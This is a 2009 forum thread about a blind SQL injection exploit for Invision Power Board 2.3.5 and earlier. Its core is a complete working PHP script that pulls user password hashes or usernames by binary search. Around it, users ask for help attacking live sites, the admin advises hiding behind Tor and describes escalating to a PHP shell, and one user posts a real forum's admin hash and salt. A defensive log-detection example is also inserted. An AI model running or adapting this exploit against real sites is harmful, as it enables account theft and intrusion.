IT Security and Insecurity Portal

Posted: Thu Jan 22, 2009 5:34 pm
OpenMASK
Regular user
Joined: Jan 22, 2009
Posts: 6

waraxe wrote: | It's probably vulnerable, because 2 tests are passing, but for some reason an SQL error occurs in a later phase. Why, I have no idea. You must debug the script (use echo, print or similar in the right places) and try to find out the server response. If needed, there can be more ways to fetch data from the same SQL injection. Just be creative. |
Thank you very much man!! )))

Posted: Thu Feb 26, 2009 3:45 am
AciddTripp
Beginner
Joined: Feb 26, 2009
Posts: 1

Thanks for the exploit, works great.
One question, what is the risk of my IP address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself?

Posted: Thu Feb 26, 2009 2:16 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

AciddTripp wrote: | Thanks for the exploit, works great.
One question, what is the risk of my IP address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself? |
It's wise to hide your IP, of course. From the exploit source:
Code:
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
Just uncomment the needed lines and use a proxy. My suggestion is Tor:
http://vidalia-project.net
Tor is slow, but bulletproof for most operations.

Posted: Fri May 01, 2009 12:26 pm
VERTIGO
Advanced user
Joined: Sep 25, 2008
Posts: 87

Posted: Sun May 03, 2009 5:47 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

As long as the specific AJAX function is accessible and the SQL injection really exists, this exploit should work.

Posted: Mon May 04, 2009 12:06 am
ba9ba9
Active user
Joined: Feb 11, 2009
Posts: 46

waraxe wrote: |
As long as the specific AJAX function is accessible and the SQL injection really exists, this exploit should work. |
Is there any method to get the prefix of a forum, because ibf_ doesn't work?

Posted: Mon Aug 17, 2009 5:17 pm
nuker
Active user
Joined: Aug 16, 2009
Posts: 39

Hi,
can this exploit be modified so you can get the admin login logs? That would be useful as it shows the number of characters and the last character of the password, so it's a little easier to figure it out.
Thank you.

Modification
Posted: Sun Aug 23, 2009 3:55 pm
RG007145
Active user
Joined: May 04, 2008
Posts: 27

A quick modification (made in a big hurry) to fetch the login username given people's ID:
Note: It says finding hash but it's finding the username. And [a-f] means [A-z] since I'm so lazy.
Note 2: A "0" in the username means a space. One or multiple "0"s after the username means it's done.
Code:
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.2
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 24. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. can work with multiple ID-s
// 6. log format compatible with passwordspro
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb/';
$id_start = 1;// starting user ID, default value "1" is admin's ID
$id_end = 10;// ending user ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
if(!extension_loaded('curl'))
{
if(!dl('php_curl.dll'))
{
die("Curl extension not loaded!\n Fatal exit ...\n");
}
else
{
echo "Curl loading success\n";
}
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
if(!isset($_REQUEST['wtf-is-cli']))
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
exit;
}
else
{
// Let's try to maximize our chances without CLI
@set_time_limit(0);
}
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("Target: $url");
for($i = $id_start; $i <= $id_end; $i ++)
{
echo "Testing ID $i\n";
if(!test_target_id($i))
{
echo "ID $i not valid, passing ...\n";
continue;
}
echo "ID $i validated\n";
$hash = get_hash($i);
$salt = '';
$line = "$i:$hash:$salt";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
}
add_line("------------------------------------------");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'notfound')
{
die('Target is patched? Exiting ...');
}
if($buff !== 'found')
{
die('Invalid response, target URL not valid? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function test_target_id($id)
{
global $url, $prefix;
$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
return test_condition($post);
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
global $prefix;
$char = '';
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members WHERE id=$id AND ORD(SUBSTR(name,$pos,1))";
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 65;
$max = 122;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);
while(1)
{
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'found')
{
$bret = true;
break;
}
elseif($buff === 'notfound')
{
break;
}
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
//////////////////////////////////////////////////////////////////////
?>
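The defensive side of the logging question raised earlier in the thread (AciddTripp's post and waraxe's reply) and of the per-character search loop in the script above, as an added example that is neither waraxe's nor RG007145's code and not part of IPB: the probes travel in POST bodies, so a plain access log records only the URL, but a WAF or audit log that keeps request bodies exposes two things the script cannot hide, the double-encoded quote (`%2527`, which the web server's single decode turns into `%27`, something a browser never leaves behind) and the burst of near-identical `check-display-name` requests that the binary search makes. The log entries, the table prefix `ibf_`, the client addresses and the rate threshold are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote

# Constructed sample entries (client IP, raw POST body); not real traffic. 203.0.113.5 mimics the script above.
SAMPLE_LOG = [
    ("198.51.100.9", "act=xmlout&do=check-display-name&name=alice"),
    ("198.51.100.9", "act=xmlout&do=check-display-name&name=bob%27s"),
    ("203.0.113.5", "act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- "),
] + [
    ("203.0.113.5", "act=xmlout&do=check-display-name&name=%2527 OR 1=%2522%2527%2522 UNION SELECT 1,1 "
                    f"FROM ibf_members WHERE id=1 AND ORD(SUBSTR(name,{pos},1))%253e57 OR 1=%2522%2527%2522-- ")
    for pos in range(1, 13)
]

SQLI_RE = re.compile(r"\bOR\s+1=|UNION\s+SELECT|\bSUBSTR\s*\(|--\s*$", re.I)
RESIDUE_RE = re.compile(r"%2[27]|%3[ce]", re.I)  # ' " < > still percent-encoded after one decode
RATE_THRESHOLD = 10  # display-name checks per client in the window under review (assumed value)

def inspect(body):
    """Return (is_display_name_check, signature_hits) for one raw POST body."""
    params = parse_qs(body, keep_blank_values=True)  # the web server's single URL decode
    if params.get("do") != ["check-display-name"]:
        return False, []
    name = params.get("name", [""])[0]
    hits = []
    if RESIDUE_RE.search(name):              # a browser encodes once; %2527 -> %27 is a second layer
        hits.append("double-encoded quote in name")
    if SQLI_RE.search(unquote(name)):        # what the application sees after its own second decode
        hits.append("sql keywords after second decode")
    return True, hits

def analyze(entries, rate_threshold=RATE_THRESHOLD):
    """Return {client_ip: sorted findings} over (ip, body) entries; clean clients are absent."""
    findings, volume = {}, Counter()
    for ip, body in entries:
        is_check, hits = inspect(body)
        volume[ip] += int(is_check)
        for hit in hits:
            findings.setdefault(ip, set()).add(hit)
    for ip, n in volume.items():
        if n >= rate_threshold:              # the script needs roughly 7 probes per character, 32 characters per user
            findings.setdefault(ip, set()).add(f"{n} display-name checks (extraction burst)")
    return {ip: sorted(f) for ip, f in findings.items()}

if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(hits))
```

The legitimate apostrophe in `bob%27s` is decoded once and left alone, so the residue rule does not fire on ordinary names.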

Posted: Mon Aug 24, 2009 3:21 am
nuker
Active user
Joined: Aug 16, 2009
Posts: 39

Nice, can you modify it so you can get the admin login logs with it?

Posted: Thu Oct 22, 2009 7:35 am
Meithal
Beginner
Joined: Oct 22, 2009
Posts: 3

Tere!
Is there any means to use this exploit to UPDATE a table? It's a question of LIFE or DEATH. Thank you!

Posted: Thu Oct 22, 2009 9:59 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Meithal wrote: | Tere!
Is there any means to use this exploit to UPDATE a table? It's a question of LIFE or DEATH. Thank you! |
Tere
In the case of the PHP/MySQL combination, stacked (multiple) SQL queries are not allowed. So you need an SQL injection vulnerability in an UPDATE query in order to manipulate a specific table in a writable manner.
My IPB exploit is based on SQL injection in a SELECT query, so it is not able to UPDATE directly. But if you can fetch the admin hash(es) and they are crackable, then IPB admin level and finally PHP code level are possible (PHP shell). Which means that you can modify the SQL database from PHP.

Posted: Thu Oct 22, 2009 10:40 am
Meithal
Beginner
Joined: Oct 22, 2009
Posts: 3

OK thanks, of course the SQL shell doesn't allow updating the tables you need, but there are still the template bits where there is a lot of PHP code; let's go here.

not work
Posted: Wed Nov 04, 2009 12:21 pm
Doky
Beginner
Joined: Nov 04, 2009
Posts: 1

Hi, not working...
The script generates the hash & salt... doesn't work :(
------------------------------------------
User ID: 142348 (Root admin)
Hash: 00d2594a7a719d383ad178778951461b
Salt: UVe3'
------------------------------------------
www.netmozi.com
Doesn't work, can't log in... :S
Test please, thanks.

Posted: Sat Nov 07, 2009 11:33 pm
RG007145
Active user
Joined: May 04, 2008
Posts: 27

You're not allowed to post websites...

Posted: Thu Dec 10, 2009 1:09 am
AgentJ9
Active user
Joined: Sep 07, 2008
Posts: 26

Does it still work? And what version of PHP will I need?